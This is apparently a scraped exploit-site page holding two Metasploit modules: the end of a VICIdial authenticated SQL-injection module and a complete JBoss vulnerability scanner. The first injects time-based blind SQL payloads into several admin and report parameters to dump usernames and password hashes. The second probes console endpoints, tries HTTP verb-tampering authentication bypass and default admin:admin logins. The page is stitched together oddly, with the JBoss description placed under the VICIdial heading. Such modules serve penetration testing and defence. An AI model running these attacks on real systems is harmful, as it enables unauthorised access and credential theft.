'admin_hide_phone_data' => '0',      'ignore_group_on_search' => '0',      'user_admin_redirect_url' => '',      'view_reports' => '0',      'access_recordings' => '0',      'alter_agent_interface_options' => '0',      'modify_users' => '0',      'change_agent_campaign' => '0',      'delete_users' => '0',      'modify_usergroups' => '0',      'delete_user_groups' => '0',      'modify_lists' => '0',      'delete_lists' => '0',      'load_leads' => '0',      'modify_leads' => '0',      'export_gdpr_leads' => '0',      'download_lists' => '0',      'export_reports' => '0',      'delete_from_dnc' => '0',      'modify_campaigns' => '0',      'campaign_detail' => '0',      'delete_campaigns' => '0',      'modify_ingroups' => '0',      'delete_ingroups' => '0',      'modify_inbound_dids' => '0',      'delete_inbound_dids' => '0',      'modify_custom_dialplans' => '0',      'modify_remoteagents' => '0',      'delete_remote_agents' => '0',      'modify_scripts' => '0',      'delete_scripts' => '0',      'modify_filters' => '0',      'delete_filters' => '0',      'ast_admin_access' => '0',      'ast_delete_phones' => '0',      'modify_call_times' => '0',      'delete_call_times' => '0',      'modify_servers' => '0',      'modify_shifts' => '0',      'modify_phones' => '0',      'modify_carriers' => '0',      'modify_email_accounts' => '0',      'vKik' => 'vKik',      'modify_labels' => '0',      'modify_colors' => '0',      'modify_languages' => '0',      'modify_statuses' => '0',      'modify_voicemail' => '0',      'modify_audiostore' => '0',      'modify_moh' => '0',      'modify_tts' => '0',      'modify_contacts' => '0',      'callcard_admin' => '0',      'modify_auto_reports' => '0',      'add_timeclock_log' => '0',      'modify_timeclock_log' => '0',      'delete_timeclock_log' => '0',      'manager_shift_enforcement_override' => '0',      'pause_code_approval' => '0',      'admin_cf_show_hidden' => '0',      'modify_ip_lists' => '0',      'ignore_ip_list' => '0',      'two_factor_override' => 'NOT_ACTIVE',      'vdc_agent_api_access' => '0',      'api_list_restrict' => '0',      'api_allowed_functions[]' => 'ALL_FUNCTIONS',      'api_only_user' => '0',      'modify_same_user_level' => '1',      'alter_admin_interface_options' => '1',      'SUBMIT' => 'SUBMIT'    }  end  def basic_auth    user_pass = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"    {      'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"    }  end  def inject_admin_page(param, payload)    data = post_4a    d = Rex::Text.rand_text_numeric(4)    data[param] = "0' AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND '#{d}'='#{d}"    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'vicidial', 'admin.php'),      'headers' => basic_auth,      'vars_post' => data    })    fail_with Failure::Unreachable, 'Connection failed' unless res  end  def run_host(ip)    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'vicidial', 'admin.php'),      'headers' => basic_auth    })    fail_with(Failure::Unreachable, 'Failed to load website') unless res    fail_with(Failure::NoAccess, 'Invalid login/password') if res.code == 401    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload|      d = Rex::Text.rand_text_numeric(4)      if datastore['ACTION'] == 'List Users - modify_email_accounts method'        inject_admin_page('modify_email_accounts', payload)      elsif datastore['ACTION'] == 'List Users - access_recordings method'        inject_admin_page('access_recordings', payload)      elsif datastore['ACTION'] == 'List Users - agentcall_email method'        inject_admin_page('agentcall_email', payload)      elsif datastore['ACTION'] == 'List Users - agent_time_sheet method'        res = send_request_cgi({          'method' => 'GET',          'uri' => normalize_uri(target_uri.path, 'vicidial', 'AST_agent_time_sheet.php'),          'headers' => basic_auth,          'vars_get' => {            'agent' => "0' AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND '#{d}'='#{d}"          }        })      elsif datastore['ACTION'] == 'List Users - user_stats method'        res = send_request_cgi({          'method' => 'GET',          'uri' => normalize_uri(target_uri.path, 'vicidial', 'user_stats.php'),          'headers' => basic_auth,          'vars_get' => {            'DB' => '',            'pause_code_rpt' => '',            'park_rpt' => '1',            'did_id' => '',            'did' => '',            'begin_date' => Date.today.to_s,            'end_date' => Date.today.to_s,            'user' => '',            'submit' => 'submit',            'search_archived_data' => '',            'NVAuser' => '',            'file_download' => "1' AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND '#{d}'='#{d}"          }        })      end    end    unless @sqli.test_vulnerable      print_bad("#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")      return    end    columns = ['user', 'pass']    print_status('Enumerating Usernames and Password Hashes')    data = @sqli.dump_table_fields('vicidial_users', columns, '', datastore['COUNT'])    table = Rex::Text::Table.new('Header' => 'vicidial_users', 'Indent' => 1, 'Columns' => columns)    data.each do |user|      create_credential({        workspace_id: myworkspace_id,        origin_type: :service,        module_fullname: fullname,        username: user[0],        private_type: :password,        private_data: user[1],        service_name: 'VICIdial',        address: ip,        port: datastore['RPORT'],        protocol: 'tcp',        status: Metasploit::Model::Login::Status::UNTRIED      })      table << user    end    print_good('Dumped table contents:')    print_line(table.to_s)  endend

VICIdial Multiple Authenticated SQL Injection

This Metasploit module scans a JBoss instance for a few vulnerabilities.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize(info = {})    super(update_info(info,      'Name'                  => 'JBoss Vulnerability Scanner',      'Description'           => %q(        This module scans a JBoss instance for a few vulnerabilities.      ),      'Author'                =>        [          'Tyler Krpata',          'Zach Grace <@ztgrace>'        ],      'References'            =>        [          [ 'CVE', '2008-3273' ], # info disclosure via unauthenticated access to "/status"          [ 'CVE', '2010-1429' ], # info disclosure via unauthenticated access to "/status" (regression)          [ 'CVE', '2010-0738' ], # VERB auth bypass on "JMX-Console": /jmx-console/          [ 'CVE', '2010-1428' ], # VERB auth bypass on "Web Console": /web-console/          [ 'CVE', '2017-12149' ] # deserialization: "/invoker/readonly"        ],      'License'               => BSD_LICENSE      ))    register_options(      [        OptString.new('VERB',  [ true,  "Verb for auth bypass testing", "HEAD"])      ])  end  def run_host(ip)    res = send_request_cgi(      {        'uri'       => "/" + Rex::Text.rand_text_alpha(12),        'method'    => 'GET',        'ctype'     => 'text/plain'      })    if res      info = http_fingerprint(:response => res)      print_status("#{rhost}:#{rport} Fingerprint: #{info}")      if res.body && />(JBoss[^<]+)/.match(res.body)        print_error("#{rhost}:#{rport} JBoss error message: #{$1}")      end      apps = [        '/jmx-console/HtmlAdaptor',        '/jmx-console/checkJNDI.jsp',        '/status',        '/web-console/ServerInfo.jsp',        # apps added per Patrick Hof        '/web-console/Invoker',        '/invoker/JMXInvokerServlet',        '/invoker/readonly'      ]      print_status("#{rhost}:#{rport} Checking http...")      apps.each do |app|        check_app(app)      end      jboss_as_default_creds      ports = {        # 1098i, 1099, and 4444 needed to use twiddle        1098 => 'Naming Service',        1099 => 'Naming Service',        4444 => 'RMI invoker'      }      print_status("#{rhost}:#{rport} Checking services...")      ports.each do |port, service|        status = test_connection(ip, port) == :up ? "open" : "closed"        print_status("#{rhost}:#{rport} #{service} tcp/#{port}: #{status}")      end    end  end  def check_app(app)    res = send_request_cgi({      'uri'       => app,      'method'    => 'GET',      'ctype'     => 'text/plain'    })    unless res      print_status("#{rhost}:#{rport} #{app} not found")      return    end    case    when res.code == 200      print_good("#{rhost}:#{rport} #{app} does not require authentication (200)")    when res.code == 403      print_status("#{rhost}:#{rport} #{app} restricted (403)")    when res.code == 401      print_status("#{rhost}:#{rport} #{app} requires authentication (401): #{res.headers['WWW-Authenticate']}")      bypass_auth(app)      basic_auth_default_creds(app)    when res.code == 404      print_status("#{rhost}:#{rport} #{app} not found (404)")    when res.code == 301, res.code == 302      print_status("#{rhost}:#{rport} #{app} is redirected (#{res.code}) to #{res.headers['Location']} (not following)")    when res.code == 500 && app == "/invoker/readonly"      print_good("#{rhost}:#{rport} #{app} responded (#{res.code})")    else      print_status("#{rhost}:#{rport} Don't know how to handle response code #{res.code}")    end  end  def jboss_as_default_creds    print_status("#{rhost}:#{rport} Checking for JBoss AS default creds")    session = jboss_as_session_setup(rhost, rport)    return false if session.nil?    # Default AS creds    username = 'admin'    password = 'admin'    res = send_request_raw({      'uri'      => '/admin-console/login.seam',      'method'   => 'POST',      'version'  => '1.1',      'vhost'    => "#{rhost}",      'headers'  => { 'Content-Type'  => 'application/x-www-form-urlencoded',                      'Cookie'        => "JSESSIONID=#{session['jsessionid']}"                    },      'data'     => "login_form=login_form&login_form%3Aname=#{username}&login_form%3Apassword=#{password}&login_form%3Asubmit=Login&javax.faces.ViewState=#{session["viewstate"]}"    })    # Valid creds if 302 redirected to summary.seam and not error.seam    if res && res.code == 302 && res.headers.to_s !~ /error.seam/m && res.headers.to_s =~ /summary.seam/m      print_good("#{rhost}:#{rport} Authenticated using #{username}:#{password} at /admin-console/")      add_creds(username, password)    else      print_status("#{rhost}:#{rport} Could not guess admin credentials")    end  end  def add_creds(username, password)    service_data = {      address: rhost,      port: rport,      service_name: 'jboss',      protocol: 'tcp',      workspace_id: framework.db.workspace.id    }    credential_data = {      module_fullname: self.fullname,      origin_type: :service,      private_data: password,      private_type: :password,      username: username    }.merge(service_data)    credential_core = create_credential(credential_data)    credential_data[:core] = credential_core    create_credential_login(credential_data)  end  def jboss_as_session_setup(rhost, rport)    res = send_request_raw({      'uri'       => '/admin-console/login.seam',      'method'    => 'GET',      'version'   => '1.1',      'vhost'     => "#{rhost}"    })    unless res      return nil    end    begin      viewstate = /javax.faces.ViewState" value="(.*)" auto/.match(res.body).captures[0]      jsessionid = /JSESSIONID=(.*);/.match(res.headers.to_s).captures[0]    rescue ::NoMethodError      print_status("#{rhost}:#{rport} Could not guess admin credentials")      return nil    end    { 'jsessionid' => jsessionid, 'viewstate' => viewstate }  end  def bypass_auth(app)    print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})")    res = send_request_raw({      'uri'       => app,      'method'    => datastore['VERB'],      'version'   => '1.0' # 1.1 makes the head request wait on timeout for some reason    })    if res && res.code == 200      print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering at #{app}")    else      print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")    end  end  def basic_auth_default_creds(app)    res = send_request_cgi({      'uri'       => app,      'method'    => 'GET',      'ctype'     => 'text/plain',      'authorization' => basic_auth('admin', 'admin')    })    if res && res.code == 200      print_good("#{rhost}:#{rport} Authenticated using admin:admin at #{app}")      add_creds("admin", "admin")    else      print_status("#{rhost}:#{rport} Could not guess admin credentials")    end  end  # function stole'd from mssql_ping  def test_connection(ip, port)    begin      sock = Rex::Socket::Tcp.create(        'PeerHost' => ip,        'PeerPort' => port,        'Timeout' => 20      )    rescue Rex::ConnectionError      return :down    end    sock.close    return :up  endend

Tag

#sql